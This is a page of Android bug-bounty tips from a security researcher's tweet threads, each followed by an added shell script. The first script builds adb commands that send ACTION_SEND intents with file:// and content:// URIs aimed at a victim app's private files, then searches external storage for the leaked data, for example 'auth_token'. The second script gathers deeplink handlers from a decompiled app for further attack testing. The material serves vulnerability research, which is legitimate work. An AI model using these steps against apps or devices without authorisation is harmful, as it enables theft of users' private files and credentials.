Sergey Toshin 🇺🇦
Ranked as the #1 hacker for Google Play Security Rewards Program. The founder of @OversecuredInc Android and iOS vulnerability scanners
Nov 18, 2020 4 tweets 2 min read
#bugbountytips
An almost universal way to steal or overwrite arbitrary files on #android is sharing activities. You can find them in AndroidManifest.xml. They handle android.intent.action.SEND. Use the PoC from blog.oversecured.com/Evernote-Unive… (ctrl+f "EXTRA_STREAM") and test 4 scenarios:
1. Send a Uri to an internal file using the file:// scheme (direct or using a symlink)
2. Send a Uri to an internal file using a victim app's internal content provider
now grep private file contents on SD card
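Added example, not code from the thread or from Oversecured: a small shell harness that drives the ACTION_SEND / EXTRA_STREAM test described above through adb, so scenarios 1 and 2 can be tried without building an attacker APK (the receiving activity opens the Uri with its own identity no matter who sent the intent). The package name, activity, provider authority and file name are placeholders, not real identifiers; take the real ones from the target's AndroidManifest.xml.

```shell
#!/bin/sh
# Added example, not code from the thread or from Oversecured: drives the
# ACTION_SEND / EXTRA_STREAM test through adb, so no attacker APK is needed
# (the receiving activity opens the Uri with its own identity no matter who
# sent the intent). Package, activity, provider authority and file name are
# placeholders; take the real ones from the victim's AndroidManifest.xml.

VICTIM_PKG="${VICTIM_PKG:-com.example.victim}"                       # placeholder
VICTIM_ACTIVITY="${VICTIM_ACTIVITY:-.ShareActivity}"                 # placeholder
VICTIM_AUTHORITY="${VICTIM_AUTHORITY:-com.example.victim.provider}"  # placeholder

# Step 0: list the lines of a decompiled manifest that handle
# android.intent.action.SEND; the exported activities around them are targets.
find_share_activities() {
  grep -n 'android.intent.action.SEND' "$1"
}

# Build (but do not run) the `am start` line that delivers an ACTION_SEND
# intent whose EXTRA_STREAM is an arbitrary Uri. --eu passes the extra as a
# Uri, which is what getParcelableExtra(EXTRA_STREAM) in the victim expects.
build_send_cmd() {
  uri="$1"
  printf 'adb shell am start -a android.intent.action.SEND -t "*/*" -n %s/%s --eu android.intent.extra.STREAM "%s"\n' \
    "$VICTIM_PKG" "$VICTIM_ACTIVITY" "$uri"
}

# Scenario 1: file:// Uri pointing straight at a private file of the victim.
# For the symlink variant, point the Uri at a symlink in a directory the
# attacker app controls that resolves to the same private file.
scenario_file_uri() {
  build_send_cmd "file:///data/data/$VICTIM_PKG/shared_prefs/$1"
}

# Scenario 2: content:// Uri served by the victim's own provider. Even an
# unexported or permission-guarded provider is readable here, because the
# victim app is the one calling openInputStream() on it.
scenario_content_uri() {
  build_send_cmd "content://$VICTIM_AUTHORITY/$1"
}

# After the victim "shares" the file, look for a string that only the private
# file contains on external storage (runs on the device via adb shell).
check_leak() {
  adb shell grep -rl "$1" /sdcard
}

# Usage (commands are printed; pipe them to sh to run them against a device):
#   find_share_activities out/resources/AndroidManifest.xml
#   scenario_file_uri prefs.xml | sh
#   scenario_content_uri prefs.xml | sh
#   check_leak 'auth_token'
```

The commands are printed rather than executed so they can be reviewed before anything touches a device; the file:// form works from adb even on Android 7+, because the FileUriExposedException StrictMode check only applies to the app that builds the intent, not to the one that reads the Uri.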
Aug 16, 2020 4 tweets 2 min read
#bugbounty

You must love #Android deeplinks! They are the easiest way to get bounties
1. Decompile an app with jadx
2. Collect all deeplink handlers from AndroidManifest.xml, they look like <data android:scheme="airbnb" android:host="d"/>
3. Grep all sources and resources for a pattern from a handler, in this case, airbnb://d
4. You could find a lot of hardcoded URLs like airbnb://d/openurl?url=https://airbnb.com/blabla. That's much simpler than learning the app's sources
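Added example, not code from the thread: a shell script that automates steps 2 and 3 above by pulling the deeplink handlers out of a decompiled AndroidManifest.xml and grepping the jadx output for literal uses of each one. It assumes the directory layout `jadx -d out app.apk` produces (out/resources/AndroidManifest.xml and out/sources/); the manifest, Java file and strings.xml in make_sample are constructed for the example, with a made-up `example://d` scheme standing in for a real app's handler.

```shell
#!/bin/sh
# Added example, not code from the thread: automates steps 2 and 3 above.
# Pulls the deeplink handlers out of a decompiled AndroidManifest.xml and
# greps the jadx output for literal uses of each one. Assumes the layout
# `jadx -d out app.apk` produces (out/resources/AndroidManifest.xml and
# out/sources/); the files written by make_sample are constructed here so
# the script runs without an APK.

# Print scheme://host for every <data> element that carries android:scheme.
# The file is joined into one line first so a tag split across lines still
# matches. A <data> with a scheme but no host matches every host and is
# printed as scheme://, which is worth a look on its own.
extract_deeplinks() {
  tr '\n' ' ' < "$1" | grep -o '<data [^>]*>' |
  while read -r tag; do
    scheme=$(printf '%s' "$tag" | sed -n 's/.*android:scheme="\([^"]*\)".*/\1/p')
    host=$(printf '%s' "$tag" | sed -n 's/.*android:host="\([^"]*\)".*/\1/p')
    [ -n "$scheme" ] && printf '%s://%s\n' "$scheme" "$host"
  done | sort -u
}

# Grep sources and resources for each handler as a literal string; the hits
# are the hardcoded URLs step 4 talks about. Output is path:line:content.
grep_deeplinks() {
  manifest="$1"; outdir="$2"
  extract_deeplinks "$manifest" | while read -r link; do
    grep -rnF -- "$link" "$outdir" || true
  done | sort -u
}

# Constructed sample jadx output tree; scheme, host and package are made up.
make_sample() {
  d=$(mktemp -d)
  mkdir -p "$d/resources/res/values" "$d/sources/com/example/app"
  cat > "$d/resources/AndroidManifest.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <activity android:name=".DeepLinkActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="example" android:host="d"/>
      </intent-filter>
      <intent-filter android:autoVerify="true">
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https"
              android:host="www.example.com"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
EOF
  cat > "$d/sources/com/example/app/PromoActivity.java" <<'EOF'
package com.example.app;

public class PromoActivity {
    // hardcoded deeplink whose url= parameter is the thing to test next
    static final String PROMO = "example://d/openurl?url=https://www.example.com/promo";
}
EOF
  cat > "$d/resources/res/values/strings.xml" <<'EOF'
<resources>
    <string name="help_link">example://d/help</string>
</resources>
EOF
  printf '%s\n' "$d"
}

# Usage against a real decompile:
#   grep_deeplinks out/resources/AndroidManifest.xml out
```

The grep is a plain prefix match, so `example://d` also hits hosts such as `example://docs`; append `/` or `?` to the pattern when a manifest declares several hosts that share a prefix. Handlers whose `<data>` splits scheme, host and pathPrefix across separate elements are still reported, only without the path part.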